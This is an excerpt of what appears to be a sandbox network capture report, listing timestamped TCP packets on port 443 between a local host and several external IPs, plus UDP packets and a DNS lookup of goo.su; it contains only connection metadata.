                                                                                                                                                                                                Dec 17, 2024 08:43:24.658093929 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:24.658328056 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:24.658385992 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:24.658802032 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:24.699338913 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.231283903 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.231359959 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.231369972 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.231384993 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.231592894 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.239595890 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.239820957 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.266701937 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.266791105 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.277998924 CET4434971788.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.278083086 CET49717443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:25.281963110 CET49717443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:25.281984091 CET4434971788.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.282387972 CET4434971788.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.282457113 CET49717443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:25.282829046 CET49717443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:25.323374033 CET4434971788.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.357697964 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.357815027 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.435964108 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.436131954 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.436140060 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.436172009 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.436192036 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.436227083 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.461395025 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.461724043 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.462306976 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.462389946 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:25.469388008 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.469471931 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.485718012 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:25.485750914 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.486299038 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.486548901 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.486785889 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.486855984 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:25.487243891 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:25.494550943 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.494695902 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.519615889 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.519738913 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.519766092 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.519798994 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.519815922 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.519942999 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.527331114 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.616302967 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.616632938 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.617492914 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.617587090 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.627219915 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.627336979 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.631874084 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.631973982 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.645783901 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.645937920 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.645951033 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.646044016 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.659015894 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.659204960 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.672116995 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.672194958 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.672208071 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.672300100 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.687551975 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.687621117 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.687628031 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.687637091 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.687666893 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.687727928 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.697140932 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.697206020 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.697225094 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.697312117 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.706423044 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.706501007 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.706509113 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.706557989 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.720451117 CET4434971788.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.720526934 CET49717443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:25.720530987 CET4434971788.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.720580101 CET49717443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:25.733248949 CET49717443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:25.733268023 CET4434971788.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.734481096 CET49724443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:25.734520912 CET4434972488.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.734586954 CET49724443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:25.734808922 CET49724443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:25.734824896 CET4434972488.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.806974888 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.807116985 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.807133913 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.807205915 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.813564062 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.813647985 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.813658953 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.813783884 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.823278904 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.823355913 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.823365927 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.823434114 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.830193043 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.830269098 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.830277920 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.830339909 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.836740971 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.836827040 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.836834908 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.836882114 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.845163107 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.845246077 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.845261097 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.845364094 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.851623058 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.851778030 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.851785898 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.851967096 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.858058929 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.858143091 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.860018969 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.860088110 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.865480900 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.865597010 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.865607023 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.865695953 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.870770931 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.870922089 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.870933056 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.871048927 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.877178907 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.877377033 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.877389908 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.877569914 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.882225990 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.882323980 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.882333994 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.882428885 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.887305975 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.887430906 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.887443066 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.887557983 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.909060955 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.909459114 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:25.909466982 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:25.909517050 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.006568909 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.006649017 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.006668091 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.006733894 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.009613991 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.009790897 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.009798050 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.009891033 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.014369011 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.014575005 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.014584064 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.014669895 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.016634941 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.016781092 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.017802954 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.017908096 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.020210028 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.020411015 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.020416975 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.020484924 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.021377087 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.021481991 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.024799109 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.024931908 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.025934935 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.026038885 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.028273106 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.028351068 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.029526949 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.029581070 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.031863928 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.031945944 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.032998085 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.033154011 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.033160925 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.033222914 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.036585093 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.036675930 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.037693024 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.037775993 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.039874077 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.039982080 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.041609049 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.041667938 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.043895006 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.044023037 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.044028997 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.044087887 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.044147968 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.044161081 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:26.044197083 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.044210911 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:26.044239998 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:26.045170069 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.045226097 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.047512054 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.047785044 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.048718929 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.048800945 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.052082062 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.052213907 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.053262949 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.053323030 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.055594921 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.055843115 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.056829929 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.056962013 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.059130907 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.059190989 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.060164928 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.060224056 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.129120111 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.129334927 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.130132914 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.130270004 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.160522938 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.160569906 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.160615921 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:26.160645962 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.160676956 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:26.160693884 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:26.191900015 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.191971064 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.192683935 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.192744017 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.194575071 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.194798946 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.195420980 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.195482016 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.197144985 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.197263002 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.198038101 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.198110104 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.199664116 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.199749947 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.199755907 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.199908018 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.199955940 CET49713443192.168.2.7213.180.204.90
                                                                                                                                                                                                Dec 17, 2024 08:43:26.199975014 CET44349713213.180.204.90192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.235963106 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.236063957 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:26.236063957 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.236103058 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.236131907 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:26.236154079 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:26.236159086 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.236247063 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:26.236299992 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:26.236377001 CET49716443192.168.2.795.163.52.67
                                                                                                                                                                                                Dec 17, 2024 08:43:26.236392021 CET4434971695.163.52.67192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:27.188786030 CET4434972488.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:27.188857079 CET49724443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:27.189786911 CET49724443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:27.189793110 CET4434972488.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:27.190026999 CET49724443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:27.190032005 CET4434972488.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:27.848097086 CET4434972488.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:27.848197937 CET4434972488.212.201.204192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:27.848287106 CET49724443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:27.849106073 CET49724443192.168.2.788.212.201.204
                                                                                                                                                                                                Dec 17, 2024 08:43:27.849119902 CET4434972488.212.201.204192.168.2.7

                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Dec 17, 2024 08:43:17.322525978 CET5232053192.168.2.71.1.1.1
                                                                                                                                                                                                Dec 17, 2024 08:43:17.554280996 CET53523201.1.1.1192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:19.972870111 CET5734153192.168.2.71.1.1.1
                                                                                                                                                                                                Dec 17, 2024 08:43:20.152931929 CET5353853192.168.2.71.1.1.1
                                                                                                                                                                                                Dec 17, 2024 08:43:20.204711914 CET53573411.1.1.1192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:20.596070051 CET53535381.1.1.1192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:22.957936049 CET5357653192.168.2.71.1.1.1
                                                                                                                                                                                                Dec 17, 2024 08:43:23.124644995 CET5766253192.168.2.71.1.1.1
                                                                                                                                                                                                Dec 17, 2024 08:43:23.131294012 CET6527453192.168.2.71.1.1.1
                                                                                                                                                                                                Dec 17, 2024 08:43:23.189045906 CET53535761.1.1.1192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:23.362368107 CET53576621.1.1.1192.168.2.7
                                                                                                                                                                                                Dec 17, 2024 08:43:23.364840031 CET53652741.1.1.1192.168.2.7

                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Dec 17, 2024 08:43:17.322525978 CET192.168.2.71.1.1.10x8fd0Standard query (0)goo.suA (IP address)IN (0x0001)false
